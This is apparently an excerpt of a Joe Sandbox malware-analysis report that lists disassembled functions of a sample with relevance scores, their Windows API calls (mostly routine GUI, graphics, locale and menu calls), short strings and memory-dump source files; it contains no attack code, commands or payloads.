GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
CreateHalftonePalette.GDI32(00000000), ref: 004244B9
ReleaseDC.USER32(00000000,00000000), ref: 004244C4

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00454084, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 004540B8
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004540EA
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 00454124
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0045413D
RedrawWindow.USER32(00000000,00000000,00000000,00000485), ref: 00454153

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041C8EC, Relevance: 7.6, APIs: 5, Instructions: 60

APIs

GetClassInfoA.USER32(00400000,0041C8DC,?), ref: 0041C90D
UnregisterClassA.USER32(0041C8DC,00400000), ref: 0041C936
RegisterClassA.USER32(0045C4C0), ref: 0041C940
CreateWindowExA.USER32(00000080,0041C8DC,0041C99C,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0041C96E

Part of subcall function 0041C830: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041C98B

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00420498, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

GetDC.USER32(00000000), ref: 004204B0
GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
GetPaletteEntries.GDI32(090806FA,00000000,00000008,?), ref: 004204E4
GetPaletteEntries.GDI32(090806FA,00000008,00000008,?), ref: 004204FC
ReleaseDC.USER32(00000000,?), ref: 00420518

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004099F4, Relevance: 7.6, APIs: 5, Instructions: 50

APIs

GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A8B,?,?,00000000), ref: 00409A65
EnumCalendarInfoA.KERNEL32(Function_0000997C,00000000,00000000,00000003), ref: 00409A70

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00455684, Relevance: 7.5, APIs: 5, Instructions: 25

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00455693
SetEvent.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556AE
GetCurrentThreadId.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556B3
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004556C8
CloseHandle.KERNEL32(00000000), ref: 004556D3

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044197C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287

APIs

Part of subcall function 00441460: SelectObject.GDI32(?,00000000), ref: 0044150C
Part of subcall function 00441460: PatBlt.GDI32(?,?,?,?,?,005A0049,?,00000000), ref: 00441534
Part of subcall function 00441460: SelectObject.GDI32(?,00000000), ref: 0044153E

Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00437CE1
Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00437DE3
Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000001), ref: 00437E1F

PeekMessageA.USER32(?,00000000,00000203,00000203,00000000), ref: 00441AF8

Part of subcall function 0043762C: GetCursorPos.USER32 ref: 00437690

Part of subcall function 0044134C: GetDCEx.USER32(00000000,00000000,00000412), ref: 00441387

Part of subcall function 004413AC: ReleaseDC.USER32(?,?), ref: 004413CA

GetCursorPos.USER32(?), ref: 00441BBC
SetCursor.USER32(00000000), ref: 00441C4E

Strings

41C, xrefs: 00441B04

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00425130, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203

APIs

Part of subcall function 0042429C: GetObjectA.GDI32(?,00000054,?), ref: 004242C2

SelectObject.GDI32(?,?), ref: 0042522C
GetDIBColorTable.GDI32(?,00000000,00000100,?), ref: 0042524D
SelectObject.GDI32(?,?), ref: 00425262

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042060E

Strings

BM, xrefs: 00425208

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00409AA4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Strings

yyyy, xrefs: 00409BC5
eeee, xrefs: 00409BDE
ggg, xrefs: 00409BB8

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004352E0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144

APIs

GetWindowRect.USER32(00000000,-00000044), ref: 004353CC
GetCursorPos.USER32(?), ref: 004353F7

Part of subcall function 00435170: GetCursorPos.USER32(00464B90), ref: 00435191
Part of subcall function 00435170: GetCursor.USER32 ref: 004351AD
Part of subcall function 00435170: GetDesktopWindow.USER32 ref: 0043529F

Strings

41C, xrefs: 004353AE, 004353E4
8 C, xrefs: 00435392

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043D284, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83

APIs

IsWindowVisible.USER32(?), ref: 0043D29F
ScrollWindow.USER32(?,?,?,00000000,00000000), ref: 0043D2CE
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043D344

Strings

41C, xrefs: 0043D2F1

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004573BC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80

APIs

Part of subcall function 00457338: GetCursorPos.USER32 ref: 00457341

GetCurrentThreadId.KERNEL32(00000000,004574CA,?,?,?,0045BD1C), ref: 00457488
WaitMessage.USER32 ref: 004574AA

Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
Part of subcall function 0041B680: RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
Part of subcall function 0041B680: SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
Part of subcall function 0041B680: RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Part of subcall function 004572D4: IsWindowVisible.USER32(00000000), ref: 0045730C
Part of subcall function 004572D4: IsWindowEnabled.USER32(00000000), ref: 0045731D

Strings

4kE, xrefs: 004573DE, 004573E8, 00457439, 00457461, 00457449, 0045744C, 004573F4, 004573FD
0@F, xrefs: 0045748D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044A214, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044A262
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044A2B4
DrawMenuBar.USER32(00000000), ref: 0044A2C1

Strings

P, xrefs: 0044A254

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00426624, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44

APIs

GetSystemMetrics.USER32(00000000), ref: 00426672
GetSystemMetrics.USER32(00000001), ref: 00426684

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromPoint, xrefs: 00426636
$fB, xrefs: 0042663B, 00426648, 00426654

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0040B134, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040BE0D,00000000,0040BE20), ref: 0040B13A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040BE0D,00000000,0040BE20), ref: 0040B14B

Strings

GetDiskFreeSpaceExA, xrefs: 0040B145
kernel32.dll, xrefs: 0040B135

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00434EA0, Relevance: 6.2, APIs: 4, Instructions: 204

APIs

GetDesktopWindow.USER32 ref: 00434F14
GetDesktopWindow.USER32 ref: 00435039

Part of subcall function 0043F03C: ShowCursor.USER32(00000000), ref: 0043F08D

Part of subcall function 0043F124: 6D3D5F83.COMCTL32(?,?), ref: 0043F152

Part of subcall function 0043F198: 6D3D5F17.COMCTL32(00000000,?,00435069), ref: 0043F1B4
Part of subcall function 0043F198: ShowCursor.USER32(000000FF), ref: 0043F1CF

SetCursor.USER32(00000000), ref: 00435079
SetCursor.USER32(00000000), ref: 0043508E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004511BC, Relevance: 6.1, APIs: 4, Instructions: 148

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetMenu.USER32(00000000), ref: 004512E0
SetMenu.USER32(00000000,00000000), ref: 004512FD
SetMenu.USER32(00000000,00000000), ref: 00451332
SetMenu.USER32(00000000,00000000), ref: 0045134E

Part of subcall function 004510F4: GetMenu.USER32(00000000), ref: 0045113A
Part of subcall function 004510F4: SendMessageA.USER32(00000000,00000230,00000000,00000000), ref: 00451152
Part of subcall function 004510F4: DrawMenuBar.USER32(00000000), ref: 00451163

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00454694, Relevance: 6.1, APIs: 4, Instructions: 99

APIs

Part of subcall function 00454A50: LoadCursorA.USER32(00000000,00007F00), ref: 00454A5D
Part of subcall function 00454A50: LoadCursorA.USER32(00000000,00000000), ref: 00454A8C

GetKeyboardLayout.USER32(00000000), ref: 004546D9
GetDC.USER32(00000000), ref: 0045472E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00454738
ReleaseDC.USER32(00000000,00000000), ref: 00454743

Part of subcall function 00454E70: SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454EC4
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454ED1
Part of subcall function 00454E70: GetStockObject.GDI32(0000000D), ref: 00454EE7
Part of subcall function 00454E70: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454F10
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454F20
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454F39
Part of subcall function 00454E70: GetStockObject.GDI32(0000000D), ref: 00454F5F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0040AB58, Relevance: 6.1, APIs: 4, Instructions: 95

APIs

GetThreadLocale.KERNEL32 ref: 0040AB82
GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
GetSystemMetrics.USER32(0000004A), ref: 0040AC77
GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040AAE0: GetCPInfo.KERNEL32(00000000,?), ref: 0040AAF9

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00423004, Relevance: 6.1, APIs: 4, Instructions: 83

APIs

Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F70C
Part of subcall function 0041F704: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F719
Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00000038,00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F722

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

CreateCompatibleDC.GDI32(00000000), ref: 00423059
SelectObject.GDI32(00000000,?), ref: 00423072
SelectPalette.GDI32(00000000,?,000000FF), ref: 0042309B
RealizePalette.GDI32(00000000), ref: 004230A7

Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00000038,00000000,0041E1BE,0041E1D4), ref: 0041F947
Part of subcall function 0041F940: RtlEnterCriticalSection.KERNEL32(00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F951
Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F95E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044A86C, Relevance: 6.1, APIs: 4, Instructions: 72

APIs

GetMenuState.USER32(?,?,?), ref: 0044A88F
GetSubMenu.USER32(?,?), ref: 0044A89A
GetMenuItemID.USER32(?,?), ref: 0044A8B3
GetMenuStringA.USER32(?,?,?,?,?), ref: 0044A906

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00422214, Relevance: 6.1, APIs: 4, Instructions: 64

APIs

SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422242
RealizePalette.GDI32(00000000), ref: 00422251
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 00422283
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422297

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00455CF4, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnumWindows.USER32(00455C84), ref: 00455D29
GetWindow.USER32(00000003,00000003), ref: 00455D41
GetWindowLongA.USER32(00000000,000000EC), ref: 00455D4E
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00455D8D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004167E4, Relevance: 6.1, APIs: 4, Instructions: 51

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004167FB
LoadResource.KERNEL32(?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416815
SizeofResource.KERNEL32(?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 0041682F
LockResource.KERNEL32(004160B0,00000000,?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416839

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00431A90, Relevance: 6.0, APIs: 4, Instructions: 46

APIs

Part of subcall function 004314DC: WinHelpA.USER32(00000000,004314F4,00000002,00000000), ref: 004314EB

GetTickCount.KERNEL32(00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431AAE
Sleep.KERNEL32(00000000,00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431AB7
GetTickCount.KERNEL32(00000000,00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431ABC
WinHelpA.USER32(00000000,?,?,00000000), ref: 00431AF2

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
